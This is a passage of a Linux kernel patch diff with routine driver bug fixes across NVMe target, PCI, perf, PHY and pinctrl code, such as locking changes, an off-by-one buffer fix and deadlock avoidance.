+ 		if (IS_ENABLED(CONFIG_BLK_DEV_ZONED)) {
+ 			switch (req->cmd->identify.csi) {
+@@ -711,29 +713,24 @@ static void nvmet_execute_identify(struct nvmet_req *req)
+ 		}
+ 		break;
+ 	case NVME_ID_CNS_CTRL:
+-		switch (req->cmd->identify.csi) {
+-		case NVME_CSI_NVM:
+-			return nvmet_execute_identify_ctrl(req);
+-		}
+-		break;
++		nvmet_execute_identify_ctrl(req);
++		return;
+ 	case NVME_ID_CNS_CS_CTRL:
+-		if (IS_ENABLED(CONFIG_BLK_DEV_ZONED)) {
+-			switch (req->cmd->identify.csi) {
+-			case NVME_CSI_ZNS:
+-				return nvmet_execute_identify_cns_cs_ctrl(req);
+-			default:
+-				break;
+-			}
+-		}
+-		break;
+-	case NVME_ID_CNS_NS_ACTIVE_LIST:
+ 		switch (req->cmd->identify.csi) {
+ 		case NVME_CSI_NVM:
+-			return nvmet_execute_identify_nslist(req);
+-		default:
++			nvmet_execute_identify_ctrl_nvm(req);
++			return;
++		case NVME_CSI_ZNS:
++			if (IS_ENABLED(CONFIG_BLK_DEV_ZONED)) {
++				nvmet_execute_identify_ctrl_zns(req);
++				return;
++			}
+ 			break;
+ 		}
+ 		break;
++	case NVME_ID_CNS_NS_ACTIVE_LIST:
++		nvmet_execute_identify_nslist(req);
++		return;
+ 	case NVME_ID_CNS_NS_DESC_LIST:
+ 		if (nvmet_handle_identify_desclist(req) == true)
+ 			return;
+diff --git a/drivers/nvme/target/fcloop.c b/drivers/nvme/target/fcloop.c
+index 5c16372f3b533..c780af36c1d4a 100644
+--- a/drivers/nvme/target/fcloop.c
++++ b/drivers/nvme/target/fcloop.c
+@@ -614,10 +614,11 @@ fcloop_fcp_recv_work(struct work_struct *work)
+ 	struct fcloop_fcpreq *tfcp_req =
+ 		container_of(work, struct fcloop_fcpreq, fcp_rcv_work);
+ 	struct nvmefc_fcp_req *fcpreq = tfcp_req->fcpreq;
++	unsigned long flags;
+ 	int ret = 0;
+ 	bool aborted = false;
+ 
+-	spin_lock_irq(&tfcp_req->reqlock);
++	spin_lock_irqsave(&tfcp_req->reqlock, flags);
+ 	switch (tfcp_req->inistate) {
+ 	case INI_IO_START:
+ 		tfcp_req->inistate = INI_IO_ACTIVE;
+@@ -626,11 +627,11 @@ fcloop_fcp_recv_work(struct work_struct *work)
+ 		aborted = true;
+ 		break;
+ 	default:
+-		spin_unlock_irq(&tfcp_req->reqlock);
++		spin_unlock_irqrestore(&tfcp_req->reqlock, flags);
+ 		WARN_ON(1);
+ 		return;
+ 	}
+-	spin_unlock_irq(&tfcp_req->reqlock);
++	spin_unlock_irqrestore(&tfcp_req->reqlock, flags);
+ 
+ 	if (unlikely(aborted))
+ 		ret = -ECANCELED;
+@@ -655,8 +656,9 @@ fcloop_fcp_abort_recv_work(struct work_struct *work)
+ 		container_of(work, struct fcloop_fcpreq, abort_rcv_work);
+ 	struct nvmefc_fcp_req *fcpreq;
+ 	bool completed = false;
++	unsigned long flags;
+ 
+-	spin_lock_irq(&tfcp_req->reqlock);
++	spin_lock_irqsave(&tfcp_req->reqlock, flags);
+ 	fcpreq = tfcp_req->fcpreq;
+ 	switch (tfcp_req->inistate) {
+ 	case INI_IO_ABORTED:
+@@ -665,11 +667,11 @@ fcloop_fcp_abort_recv_work(struct work_struct *work)
+ 		completed = true;
+ 		break;
+ 	default:
+-		spin_unlock_irq(&tfcp_req->reqlock);
++		spin_unlock_irqrestore(&tfcp_req->reqlock, flags);
+ 		WARN_ON(1);
+ 		return;
+ 	}
+-	spin_unlock_irq(&tfcp_req->reqlock);
++	spin_unlock_irqrestore(&tfcp_req->reqlock, flags);
+ 
+ 	if (unlikely(completed)) {
+ 		/* remove reference taken in original abort downcall */
+@@ -681,9 +683,9 @@ fcloop_fcp_abort_recv_work(struct work_struct *work)
+ 		nvmet_fc_rcv_fcp_abort(tfcp_req->tport->targetport,
+ 					&tfcp_req->tgt_fcp_req);
+ 
+-	spin_lock_irq(&tfcp_req->reqlock);
++	spin_lock_irqsave(&tfcp_req->reqlock, flags);
+ 	tfcp_req->fcpreq = NULL;
+-	spin_unlock_irq(&tfcp_req->reqlock);
++	spin_unlock_irqrestore(&tfcp_req->reqlock, flags);
+ 
+ 	fcloop_call_host_done(fcpreq, tfcp_req, -ECANCELED);
+ 	/* call_host_done releases reference for abort downcall */
+@@ -699,11 +701,12 @@ fcloop_tgt_fcprqst_done_work(struct work_struct *work)
+ 	struct fcloop_fcpreq *tfcp_req =
+ 		container_of(work, struct fcloop_fcpreq, tio_done_work);
+ 	struct nvmefc_fcp_req *fcpreq;
++	unsigned long flags;
+ 
+-	spin_lock_irq(&tfcp_req->reqlock);
++	spin_lock_irqsave(&tfcp_req->reqlock, flags);
+ 	fcpreq = tfcp_req->fcpreq;
+ 	tfcp_req->inistate = INI_IO_COMPLETED;
+-	spin_unlock_irq(&tfcp_req->reqlock);
++	spin_unlock_irqrestore(&tfcp_req->reqlock, flags);
+ 
+ 	fcloop_call_host_done(fcpreq, tfcp_req, tfcp_req->status);
+ }
+@@ -807,13 +810,14 @@ fcloop_fcp_op(struct nvmet_fc_target_port *tgtport,
+ 	u32 rsplen = 0, xfrlen = 0;
+ 	int fcp_err = 0, active, aborted;
+ 	u8 op = tgt_fcpreq->op;
++	unsigned long flags;
+ 
+-	spin_lock_irq(&tfcp_req->reqlock);
++	spin_lock_irqsave(&tfcp_req->reqlock, flags);
+ 	fcpreq = tfcp_req->fcpreq;
+ 	active = tfcp_req->active;
+ 	aborted = tfcp_req->aborted;
+ 	tfcp_req->active = true;
+-	spin_unlock_irq(&tfcp_req->reqlock);
++	spin_unlock_irqrestore(&tfcp_req->reqlock, flags);
+ 
+ 	if (unlikely(active))
+ 		/* illegal - call while i/o active */
+@@ -821,9 +825,9 @@ fcloop_fcp_op(struct nvmet_fc_target_port *tgtport,
+ 
+ 	if (unlikely(aborted)) {
+ 		/* target transport has aborted i/o prior */
+-		spin_lock_irq(&tfcp_req->reqlock);
++		spin_lock_irqsave(&tfcp_req->reqlock, flags);
+ 		tfcp_req->active = false;
+-		spin_unlock_irq(&tfcp_req->reqlock);
++		spin_unlock_irqrestore(&tfcp_req->reqlock, flags);
+ 		tgt_fcpreq->transferred_length = 0;
+ 		tgt_fcpreq->fcp_error = -ECANCELED;
+ 		tgt_fcpreq->done(tgt_fcpreq);
+@@ -880,9 +884,9 @@ fcloop_fcp_op(struct nvmet_fc_target_port *tgtport,
+ 		break;
+ 	}
+ 
+-	spin_lock_irq(&tfcp_req->reqlock);
++	spin_lock_irqsave(&tfcp_req->reqlock, flags);
+ 	tfcp_req->active = false;
+-	spin_unlock_irq(&tfcp_req->reqlock);
++	spin_unlock_irqrestore(&tfcp_req->reqlock, flags);
+ 
+ 	tgt_fcpreq->transferred_length = xfrlen;
+ 	tgt_fcpreq->fcp_error = fcp_err;
+@@ -896,15 +900,16 @@ fcloop_tgt_fcp_abort(struct nvmet_fc_target_port *tgtport,
+ 			struct nvmefc_tgt_fcp_req *tgt_fcpreq)
+ {
+ 	struct fcloop_fcpreq *tfcp_req = tgt_fcp_req_to_fcpreq(tgt_fcpreq);
++	unsigned long flags;
+ 
+ 	/*
+ 	 * mark aborted only in case there were 2 threads in transport
+ 	 * (one doing io, other doing abort) and only kills ops posted
+ 	 * after the abort request
+ 	 */
+-	spin_lock_irq(&tfcp_req->reqlock);
++	spin_lock_irqsave(&tfcp_req->reqlock, flags);
+ 	tfcp_req->aborted = true;
+-	spin_unlock_irq(&tfcp_req->reqlock);
++	spin_unlock_irqrestore(&tfcp_req->reqlock, flags);
+ 
+ 	tfcp_req->status = NVME_SC_INTERNAL;
+ 
+@@ -946,6 +951,7 @@ fcloop_fcp_abort(struct nvme_fc_local_port *localport,
+ 	struct fcloop_ini_fcpreq *inireq = fcpreq->private;
+ 	struct fcloop_fcpreq *tfcp_req;
+ 	bool abortio = true;
++	unsigned long flags;
+ 
+ 	spin_lock(&inireq->inilock);
+ 	tfcp_req = inireq->tfcp_req;
+@@ -958,7 +964,7 @@ fcloop_fcp_abort(struct nvme_fc_local_port *localport,
+ 		return;
+ 
+ 	/* break initiator/target relationship for io */
+-	spin_lock_irq(&tfcp_req->reqlock);
++	spin_lock_irqsave(&tfcp_req->reqlock, flags);
+ 	switch (tfcp_req->inistate) {
+ 	case INI_IO_START:
+ 	case INI_IO_ACTIVE:
+@@ -968,11 +974,11 @@ fcloop_fcp_abort(struct nvme_fc_local_port *localport,
+ 		abortio = false;
+ 		break;
+ 	default:
+-		spin_unlock_irq(&tfcp_req->reqlock);
++		spin_unlock_irqrestore(&tfcp_req->reqlock, flags);
+ 		WARN_ON(1);
+ 		return;
+ 	}
+-	spin_unlock_irq(&tfcp_req->reqlock);
++	spin_unlock_irqrestore(&tfcp_req->reqlock, flags);
+ 
+ 	if (abortio)
+ 		/* leave the reference while the work item is scheduled */
+diff --git a/drivers/nvme/target/nvmet.h b/drivers/nvme/target/nvmet.h
+index bda1c1f71f394..273cca49a040f 100644
+--- a/drivers/nvme/target/nvmet.h
++++ b/drivers/nvme/target/nvmet.h
+@@ -578,7 +578,7 @@ bool nvmet_ns_revalidate(struct nvmet_ns *ns);
+ u16 blk_to_nvme_status(struct nvmet_req *req, blk_status_t blk_sts);
+ 
+ bool nvmet_bdev_zns_enable(struct nvmet_ns *ns);
+-void nvmet_execute_identify_cns_cs_ctrl(struct nvmet_req *req);
++void nvmet_execute_identify_ctrl_zns(struct nvmet_req *req);
+ void nvmet_execute_identify_cns_cs_ns(struct nvmet_req *req);
+ void nvmet_bdev_execute_zone_mgmt_recv(struct nvmet_req *req);
+ void nvmet_bdev_execute_zone_mgmt_send(struct nvmet_req *req);
+diff --git a/drivers/nvme/target/zns.c b/drivers/nvme/target/zns.c
+index 1254cf57e008d..d93ee4ae19454 100644
+--- a/drivers/nvme/target/zns.c
++++ b/drivers/nvme/target/zns.c
+@@ -70,7 +70,7 @@ bool nvmet_bdev_zns_enable(struct nvmet_ns *ns)
+ 	return true;
+ }
+ 
+-void nvmet_execute_identify_cns_cs_ctrl(struct nvmet_req *req)
++void nvmet_execute_identify_ctrl_zns(struct nvmet_req *req)
+ {
+ 	u8 zasl = req->sq->ctrl->subsys->zasl;
+ 	struct nvmet_ctrl *ctrl = req->sq->ctrl;
+@@ -97,7 +97,7 @@ out:
+ 
+ void nvmet_execute_identify_cns_cs_ns(struct nvmet_req *req)
+ {
+-	struct nvme_id_ns_zns *id_zns;
++	struct nvme_id_ns_zns *id_zns = NULL;
+ 	u64 zsze;
+ 	u16 status;
+ 	u32 mar, mor;
+@@ -118,16 +118,18 @@ void nvmet_execute_identify_cns_cs_ns(struct nvmet_req *req)
+ 	if (status)
+ 		goto done;
+ 
+-	if (!bdev_is_zoned(req->ns->bdev)) {
+-		req->error_loc = offsetof(struct nvme_identify, nsid);
+-		goto done;
+-	}
+-
+ 	if (nvmet_ns_revalidate(req->ns)) {
+ 		mutex_lock(&req->ns->subsys->lock);
+ 		nvmet_ns_changed(req->ns->subsys, req->ns->nsid);
+ 		mutex_unlock(&req->ns->subsys->lock);
+ 	}
++
++	if (!bdev_is_zoned(req->ns->bdev)) {
++		status = NVME_SC_INVALID_FIELD | NVME_SC_DNR;
++		req->error_loc = offsetof(struct nvme_identify, nsid);
++		goto out;
++	}
++
+ 	zsze = (bdev_zone_sectors(req->ns->bdev) << 9) >>
+ 					req->ns->blksize_shift;
+ 	id_zns->lbafe[0].zsze = cpu_to_le64(zsze);
+@@ -148,8 +150,8 @@ void nvmet_execute_identify_cns_cs_ns(struct nvmet_req *req)
+ 
+ done:
+ 	status = nvmet_copy_to_sgl(req, 0, id_zns, sizeof(*id_zns));
+-	kfree(id_zns);
+ out:
++	kfree(id_zns);
+ 	nvmet_req_complete(req, status);
+ }
+ 
+diff --git a/drivers/of/device.c b/drivers/of/device.c
+index 8cefe5a7d04e2..ce225d2590b54 100644
+--- a/drivers/of/device.c
++++ b/drivers/of/device.c
+@@ -297,12 +297,15 @@ int of_device_request_module(struct device *dev)
+ 	if (size < 0)
+ 		return size;
+ 
+-	str = kmalloc(size + 1, GFP_KERNEL);
++	/* Reserve an additional byte for the trailing '\0' */
++	size++;
++
++	str = kmalloc(size, GFP_KERNEL);
+ 	if (!str)
+ 		return -ENOMEM;
+ 
+ 	of_device_get_modalias(dev, str, size);
+-	str[size] = '\0';
++	str[size - 1] = '\0';
+ 	ret = request_module(str);
+ 	kfree(str);
+ 
+diff --git a/drivers/pci/controller/dwc/Kconfig b/drivers/pci/controller/dwc/Kconfig
+index 62ce3abf0f196..ae9d083c406f8 100644
+--- a/drivers/pci/controller/dwc/Kconfig
++++ b/drivers/pci/controller/dwc/Kconfig
+@@ -294,6 +294,7 @@ config PCI_MESON
+ 	default m if ARCH_MESON
+ 	depends on PCI_MSI_IRQ_DOMAIN
+ 	select PCIE_DW_HOST
++	select REGMAP_MMIO
+ 	help
+ 	  Say Y here if you want to enable PCI controller support on Amlogic
+ 	  SoCs. The PCI controller on Amlogic is based on DesignWare hardware
+diff --git a/drivers/pci/controller/dwc/pci-imx6.c b/drivers/pci/controller/dwc/pci-imx6.c
+index 1dde5c579edc8..47db2d20568ef 100644
+--- a/drivers/pci/controller/dwc/pci-imx6.c
++++ b/drivers/pci/controller/dwc/pci-imx6.c
+@@ -1402,6 +1402,13 @@ DECLARE_PCI_FIXUP_CLASS_HEADER(PCI_VENDOR_ID_SYNOPSYS, 0xabcd,
+ static int __init imx6_pcie_init(void)
+ {
+ #ifdef CONFIG_ARM
++	struct device_node *np;
++
++	np = of_find_matching_node(NULL, imx6_pcie_of_match);
++	if (!np)
++		return -ENODEV;
++	of_node_put(np);
++
+ 	/*
+ 	 * Since probe() can be deferred we need to make sure that
+ 	 * hook_fault_code is not called after __init memory is freed
+diff --git a/drivers/pci/controller/dwc/pcie-qcom.c b/drivers/pci/controller/dwc/pcie-qcom.c
+index f8e512540fb85..dbe6df0cb6118 100644
+--- a/drivers/pci/controller/dwc/pcie-qcom.c
++++ b/drivers/pci/controller/dwc/pcie-qcom.c
+@@ -1276,11 +1276,9 @@ static int qcom_pcie_init_2_7_0(struct qcom_pcie *pcie)
+ 	val &= ~REQ_NOT_ENTR_L1;
+ 	writel(val, pcie->parf + PCIE20_PARF_PM_CTRL);
+ 
+-	if (IS_ENABLED(CONFIG_PCI_MSI)) {
+-		val = readl(pcie->parf + PCIE20_PARF_AXI_MSTR_WR_ADDR_HALT);
+-		val |= BIT(31);
+-		writel(val, pcie->parf + PCIE20_PARF_AXI_MSTR_WR_ADDR_HALT);
+-	}
++	val = readl(pcie->parf + PCIE20_PARF_AXI_MSTR_WR_ADDR_HALT_V2);
++	val |= BIT(31);
++	writel(val, pcie->parf + PCIE20_PARF_AXI_MSTR_WR_ADDR_HALT_V2);
+ 
+ 	return 0;
+ err_disable_clocks:
+diff --git a/drivers/pci/hotplug/pciehp_pci.c b/drivers/pci/hotplug/pciehp_pci.c
+index d17f3bf36f709..ad12515a4a121 100644
+--- a/drivers/pci/hotplug/pciehp_pci.c
++++ b/drivers/pci/hotplug/pciehp_pci.c
+@@ -63,7 +63,14 @@ int pciehp_configure_device(struct controller *ctrl)
+ 
+ 	pci_assign_unassigned_bridge_resources(bridge);
+ 	pcie_bus_configure_settings(parent);
++
++	/*
++	 * Release reset_lock during driver binding
++	 * to avoid AB-BA deadlock with device_lock.
++	 */
++	up_read(&ctrl->reset_lock);
+ 	pci_bus_add_devices(parent);
++	down_read_nested(&ctrl->reset_lock, ctrl->depth);
+ 
+  out:
+ 	pci_unlock_rescan_remove();
+@@ -104,7 +111,15 @@ void pciehp_unconfigure_device(struct controller *ctrl, bool presence)
+ 	list_for_each_entry_safe_reverse(dev, temp, &parent->devices,
+ 					 bus_list) {
+ 		pci_dev_get(dev);
++
++		/*
++		 * Release reset_lock during driver unbinding
++		 * to avoid AB-BA deadlock with device_lock.
++		 */
++		up_read(&ctrl->reset_lock);
+ 		pci_stop_and_remove_bus_device(dev);
++		down_read_nested(&ctrl->reset_lock, ctrl->depth);
++
+ 		/*
+ 		 * Ensure that no new Requests will be generated from
+ 		 * the device.
+diff --git a/drivers/pci/pcie/edr.c b/drivers/pci/pcie/edr.c
+index a6b9b479b97ad..87734e4c3c204 100644
+--- a/drivers/pci/pcie/edr.c
++++ b/drivers/pci/pcie/edr.c
+@@ -193,6 +193,7 @@ send_ost:
+ 	 */
+ 	if (estate == PCI_ERS_RESULT_RECOVERED) {
+ 		pci_dbg(edev, "DPC port successfully recovered\n");
++		pcie_clear_device_status(edev);
+ 		acpi_send_edr_status(pdev, edev, EDR_OST_SUCCESS);
+ 	} else {
+ 		pci_dbg(edev, "DPC port recovery failed\n");
+diff --git a/drivers/pci/quirks.c b/drivers/pci/quirks.c
+index 494fa46f57671..8d32a3834688f 100644
+--- a/drivers/pci/quirks.c
++++ b/drivers/pci/quirks.c
+@@ -1939,6 +1939,19 @@ static void quirk_radeon_pm(struct pci_dev *dev)
+ }
+ DECLARE_PCI_FIXUP_FINAL(PCI_VENDOR_ID_ATI, 0x6741, quirk_radeon_pm);
+ 
++/*
++ * NVIDIA Ampere-based HDA controllers can wedge the whole device if a bus
++ * reset is performed too soon after transition to D0, extend d3hot_delay
++ * to previous effective default for all NVIDIA HDA controllers.
++ */
++static void quirk_nvidia_hda_pm(struct pci_dev *dev)
++{
++	quirk_d3hot_delay(dev, 20);
++}
++DECLARE_PCI_FIXUP_CLASS_FINAL(PCI_VENDOR_ID_NVIDIA, PCI_ANY_ID,
++			      PCI_CLASS_MULTIMEDIA_HD_AUDIO, 8,
++			      quirk_nvidia_hda_pm);
++
+ /*
+  * Ryzen5/7 XHCI controllers fail upon resume from runtime suspend or s2idle.
+  * https://bugzilla.kernel.org/show_bug.cgi?id=205587
+diff --git a/drivers/perf/arm-cmn.c b/drivers/perf/arm-cmn.c
+index 1deb61b22bc76..ff86075edca48 100644
+--- a/drivers/perf/arm-cmn.c
++++ b/drivers/perf/arm-cmn.c
+@@ -57,14 +57,12 @@
+ #define CMN_INFO_REQ_VC_NUM		GENMASK_ULL(1, 0)
+ 
+ /* XPs also have some local topology info which has uses too */
+-#define CMN_MXP__CONNECT_INFO_P0	0x0008
+-#define CMN_MXP__CONNECT_INFO_P1	0x0010
+-#define CMN_MXP__CONNECT_INFO_P2	0x0028
+-#define CMN_MXP__CONNECT_INFO_P3	0x0030
+-#define CMN_MXP__CONNECT_INFO_P4	0x0038
+-#define CMN_MXP__CONNECT_INFO_P5	0x0040
++#define CMN_MXP__CONNECT_INFO(p)	(0x0008 + 8 * (p))
+ #define CMN__CONNECT_INFO_DEVICE_TYPE	GENMASK_ULL(4, 0)
+ 
++#define CMN_MAX_PORTS			6
++#define CI700_CONNECT_INFO_P2_5_OFFSET	0x10
++
+ /* PMU registers occupy the 3rd 4KB page of each node's region */
+ #define CMN_PMU_OFFSET			0x2000
+ 
+@@ -166,7 +164,7 @@
+ #define CMN_EVENT_BYNODEID(event)	FIELD_GET(CMN_CONFIG_BYNODEID, (event)->attr.config)
+ #define CMN_EVENT_NODEID(event)		FIELD_GET(CMN_CONFIG_NODEID, (event)->attr.config)
+ 
+-#define CMN_CONFIG_WP_COMBINE		GENMASK_ULL(27, 24)
++#define CMN_CONFIG_WP_COMBINE		GENMASK_ULL(30, 27)
+ #define CMN_CONFIG_WP_DEV_SEL		GENMASK_ULL(50, 48)
+ #define CMN_CONFIG_WP_CHN_SEL		GENMASK_ULL(55, 51)
+ /* Note that we don't yet support the tertiary match group on newer IPs */
+@@ -396,6 +394,25 @@ static struct arm_cmn_node *arm_cmn_node(const struct arm_cmn *cmn,
+ 	return NULL;
+ }
+ 
++static u32 arm_cmn_device_connect_info(const struct arm_cmn *cmn,
++				       const struct arm_cmn_node *xp, int port)
++{
++	int offset = CMN_MXP__CONNECT_INFO(port);
++
++	if (port >= 2) {
++		if (cmn->model & (CMN600 | CMN650))
++			return 0;
++		/*
++		 * CI-700 may have extra ports, but still has the
++		 * mesh_port_connect_info registers in the way.
++		 */
++		if (cmn->model == CI700)
++			offset += CI700_CONNECT_INFO_P2_5_OFFSET;
++	}
++
++	return readl_relaxed(xp->pmu_base - CMN_PMU_OFFSET + offset);
++}
++
+ static struct dentry *arm_cmn_debugfs;
+ 
+ #ifdef CONFIG_DEBUG_FS
+@@ -469,7 +486,7 @@ static int arm_cmn_map_show(struct seq_file *s, void *data)
+ 	y = cmn->mesh_y;
+ 	while (y--) {
+ 		int xp_base = cmn->mesh_x * y;
+-		u8 port[6][CMN_MAX_DIMENSION];
++		u8 port[CMN_MAX_PORTS][CMN_MAX_DIMENSION];
+ 
+ 		for (x = 0; x < cmn->mesh_x; x++)
+ 			seq_puts(s, "--------+");
+@@ -477,14 +494,9 @@ static int arm_cmn_map_show(struct seq_file *s, void *data)
+ 		seq_printf(s, "\n%d    |", y);
+ 		for (x = 0; x < cmn->mesh_x; x++) {
+ 			struct arm_cmn_node *xp = cmn->xps + xp_base + x;
+-			void __iomem *base = xp->pmu_base - CMN_PMU_OFFSET;
+-
+-			port[0][x] = readl_relaxed(base + CMN_MXP__CONNECT_INFO_P0);
+-			port[1][x] = readl_relaxed(base + CMN_MXP__CONNECT_INFO_P1);
+-			port[2][x] = readl_relaxed(base + CMN_MXP__CONNECT_INFO_P2);
+-			port[3][x] = readl_relaxed(base + CMN_MXP__CONNECT_INFO_P3);
+-			port[4][x] = readl_relaxed(base + CMN_MXP__CONNECT_INFO_P4);
+-			port[5][x] = readl_relaxed(base + CMN_MXP__CONNECT_INFO_P5);
++
++			for (p = 0; p < CMN_MAX_PORTS; p++)
++				port[p][x] = arm_cmn_device_connect_info(cmn, xp, p);
+ 			seq_printf(s, " XP #%-2d |", xp_base + x);
+ 		}
+ 
+@@ -2082,18 +2094,9 @@ static int arm_cmn_discover(struct arm_cmn *cmn, unsigned int rgn_offset)
+ 		 * from this, since in that case we will see at least one XP
+ 		 * with port 2 connected, for the HN-D.
+ 		 */
+-		if (readq_relaxed(xp_region + CMN_MXP__CONNECT_INFO_P0))
+-			xp_ports |= BIT(0);
+-		if (readq_relaxed(xp_region + CMN_MXP__CONNECT_INFO_P1))
+-			xp_ports |= BIT(1);
+-		if (readq_relaxed(xp_region + CMN_MXP__CONNECT_INFO_P2))
+-			xp_ports |= BIT(2);
+-		if (readq_relaxed(xp_region + CMN_MXP__CONNECT_INFO_P3))
+-			xp_ports |= BIT(3);
+-		if (readq_relaxed(xp_region + CMN_MXP__CONNECT_INFO_P4))
+-			xp_ports |= BIT(4);
+-		if (readq_relaxed(xp_region + CMN_MXP__CONNECT_INFO_P5))
+-			xp_ports |= BIT(5);
++		for (int p = 0; p < CMN_MAX_PORTS; p++)
++			if (arm_cmn_device_connect_info(cmn, xp, p))
++				xp_ports |= BIT(p);
+ 
+ 		if (cmn->multi_dtm && (xp_ports & 0xc))
+ 			arm_cmn_init_dtm(dtm++, xp, 1);
+diff --git a/drivers/perf/riscv_pmu_sbi.c b/drivers/perf/riscv_pmu_sbi.c
+index 3852c18362f53..382fe5ee6100b 100644
+--- a/drivers/perf/riscv_pmu_sbi.c
++++ b/drivers/perf/riscv_pmu_sbi.c
+@@ -869,7 +869,7 @@ static int __init pmu_sbi_devinit(void)
+ 	struct platform_device *pdev;
+ 
+ 	if (sbi_spec_version < sbi_mk_version(0, 3) ||
+-	    sbi_probe_extension(SBI_EXT_PMU) <= 0) {
++	    !sbi_probe_extension(SBI_EXT_PMU)) {
+ 		return 0;
+ 	}
+ 
+diff --git a/drivers/phy/qualcomm/phy-qcom-qmp-pcie.c b/drivers/phy/qualcomm/phy-qcom-qmp-pcie.c
+index bb40172e23d49..876a713e3874f 100644
+--- a/drivers/phy/qualcomm/phy-qcom-qmp-pcie.c
++++ b/drivers/phy/qualcomm/phy-qcom-qmp-pcie.c
+@@ -1738,7 +1738,7 @@ static const struct qmp_phy_cfg msm8998_pciephy_cfg = {
+ };
+ 
+ static const struct qmp_phy_cfg sc8180x_pciephy_cfg = {
+-	.lanes			= 1,
++	.lanes			= 2,
+ 
+ 	.tables = {
+ 		.serdes		= sc8180x_qmp_pcie_serdes_tbl,
+diff --git a/drivers/phy/tegra/xusb.c b/drivers/phy/tegra/xusb.c
+index dce45fbbd699c..ce14645a86ecb 100644
+--- a/drivers/phy/tegra/xusb.c
++++ b/drivers/phy/tegra/xusb.c
+@@ -782,6 +782,7 @@ static int tegra_xusb_add_usb2_port(struct tegra_xusb_padctl *padctl,
+ 	usb2->base.lane = usb2->base.ops->map(&usb2->base);
+ 	if (IS_ERR(usb2->base.lane)) {
+ 		err = PTR_ERR(usb2->base.lane);
++		tegra_xusb_port_unregister(&usb2->base);
+ 		goto out;
+ 	}
+ 
+@@ -848,6 +849,7 @@ static int tegra_xusb_add_ulpi_port(struct tegra_xusb_padctl *padctl,
+ 	ulpi->base.lane = ulpi->base.ops->map(&ulpi->base);
+ 	if (IS_ERR(ulpi->base.lane)) {
+ 		err = PTR_ERR(ulpi->base.lane);
++		tegra_xusb_port_unregister(&ulpi->base);
+ 		goto out;
+ 	}
+ 
+diff --git a/drivers/phy/ti/phy-j721e-wiz.c b/drivers/phy/ti/phy-j721e-wiz.c
+index 41725c6bcdf6f..6a63380f6a71f 100644
+--- a/drivers/phy/ti/phy-j721e-wiz.c
++++ b/drivers/phy/ti/phy-j721e-wiz.c
+@@ -422,18 +422,17 @@ static int wiz_mode_select(struct wiz *wiz)
+ 	int i;
+ 
+ 	for (i = 0; i < num_lanes; i++) {
+-		if (wiz->lane_phy_type[i] == PHY_TYPE_DP)
++		if (wiz->lane_phy_type[i] == PHY_TYPE_DP) {
+ 			mode = LANE_MODE_GEN1;
+-		else if (wiz->lane_phy_type[i] == PHY_TYPE_QSGMII)
++		} else if (wiz->lane_phy_type[i] == PHY_TYPE_QSGMII) {
+ 			mode = LANE_MODE_GEN2;
+-		else
+-			continue;
+-
+-		if (wiz->lane_phy_type[i] == PHY_TYPE_USXGMII) {
++		} else if (wiz->lane_phy_type[i] == PHY_TYPE_USXGMII) {
+ 			ret = regmap_field_write(wiz->p0_mac_src_sel[i], 0x3);
+ 			ret = regmap_field_write(wiz->p0_rxfclk_sel[i], 0x3);
+ 			ret = regmap_field_write(wiz->p0_refclk_sel[i], 0x3);
+ 			mode = LANE_MODE_GEN1;
++		} else {
++			continue;
+ 		}
+ 
+ 		ret = regmap_field_write(wiz->p_standard_mode[i], mode);
+diff --git a/drivers/pinctrl/bcm/pinctrl-bcm2835.c b/drivers/pinctrl/bcm/pinctrl-bcm2835.c
+index c7cdccdb4332a..0f1ab0829ffe6 100644
+--- a/drivers/pinctrl/bcm/pinctrl-bcm2835.c
++++ b/drivers/pinctrl/bcm/pinctrl-bcm2835.c
+@@ -90,6 +90,8 @@ struct bcm2835_pinctrl {
+ 	struct pinctrl_gpio_range gpio_range;
+ 
+ 	raw_spinlock_t irq_lock[BCM2835_NUM_BANKS];
++	/* Protect FSEL registers */
++	spinlock_t fsel_lock;
+ };
+ 
+ /* pins are just named GPIO0..GPIO53 */
+@@ -284,14 +286,19 @@ static inline void bcm2835_pinctrl_fsel_set(
+ 		struct bcm2835_pinctrl *pc, unsigned pin,
+ 		enum bcm2835_fsel fsel)
+ {
+-	u32 val = bcm2835_gpio_rd(pc, FSEL_REG(pin));
+-	enum bcm2835_fsel cur = (val >> FSEL_SHIFT(pin)) & BCM2835_FSEL_MASK;
++	u32 val;
++	enum bcm2835_fsel cur;
++	unsigned long flags;
++
++	spin_lock_irqsave(&pc->fsel_lock, flags);
++	val = bcm2835_gpio_rd(pc, FSEL_REG(pin));
++	cur = (val >> FSEL_SHIFT(pin)) & BCM2835_FSEL_MASK;
+ 
+ 	dev_dbg(pc->dev, "read %08x (%u => %s)\n", val, pin,
+-			bcm2835_functions[cur]);
++		bcm2835_functions[cur]);
+ 
+ 	if (cur == fsel)
+-		return;
++		goto unlock;
+ 
+ 	if (cur != BCM2835_FSEL_GPIO_IN && fsel != BCM2835_FSEL_GPIO_IN) {
+ 		/* always transition through GPIO_IN */
+@@ -309,6 +316,9 @@ static inline void bcm2835_pinctrl_fsel_set(
+ 	dev_dbg(pc->dev, "write %08x (%u <= %s)\n", val, pin,
+ 			bcm2835_functions[fsel]);
+ 	bcm2835_gpio_wr(pc, FSEL_REG(pin), val);
++
++unlock:
++	spin_unlock_irqrestore(&pc->fsel_lock, flags);
+ }
+ 
+ static int bcm2835_gpio_direction_input(struct gpio_chip *chip, unsigned offset)
+@@ -1248,6 +1258,7 @@ static int bcm2835_pinctrl_probe(struct platform_device *pdev)
+ 	pc->gpio_chip = *pdata->gpio_chip;
+ 	pc->gpio_chip.parent = dev;
+ 
++	spin_lock_init(&pc->fsel_lock);
+ 	for (i = 0; i < BCM2835_NUM_BANKS; i++) {
+ 		unsigned long events;
+ 		unsigned offset;
+diff --git a/drivers/pinctrl/qcom/pinctrl-lpass-lpi.c b/drivers/pinctrl/qcom/pinctrl-lpass-lpi.c
+index e97ce45b6d538..a55998ae29fa4 100644
+--- a/drivers/pinctrl/qcom/pinctrl-lpass-lpi.c
++++ b/drivers/pinctrl/qcom/pinctrl-lpass-lpi.c
+@@ -216,6 +216,15 @@ static int lpi_config_set(struct pinctrl_dev *pctldev, unsigned int group,
+ 		}
+ 	}
+ 
++	/*
++	 * As per Hardware Programming Guide, when configuring pin as output,
++	 * set the pin value before setting output-enable (OE).
++	 */
++	if (output_enabled) {
++		val = u32_encode_bits(value ? 1 : 0, LPI_GPIO_VALUE_OUT_MASK);
++		lpi_gpio_write(pctrl, group, LPI_GPIO_VALUE_REG, val);
++	}
++
+ 	val = lpi_gpio_read(pctrl, group, LPI_GPIO_CFG_REG);
+ 
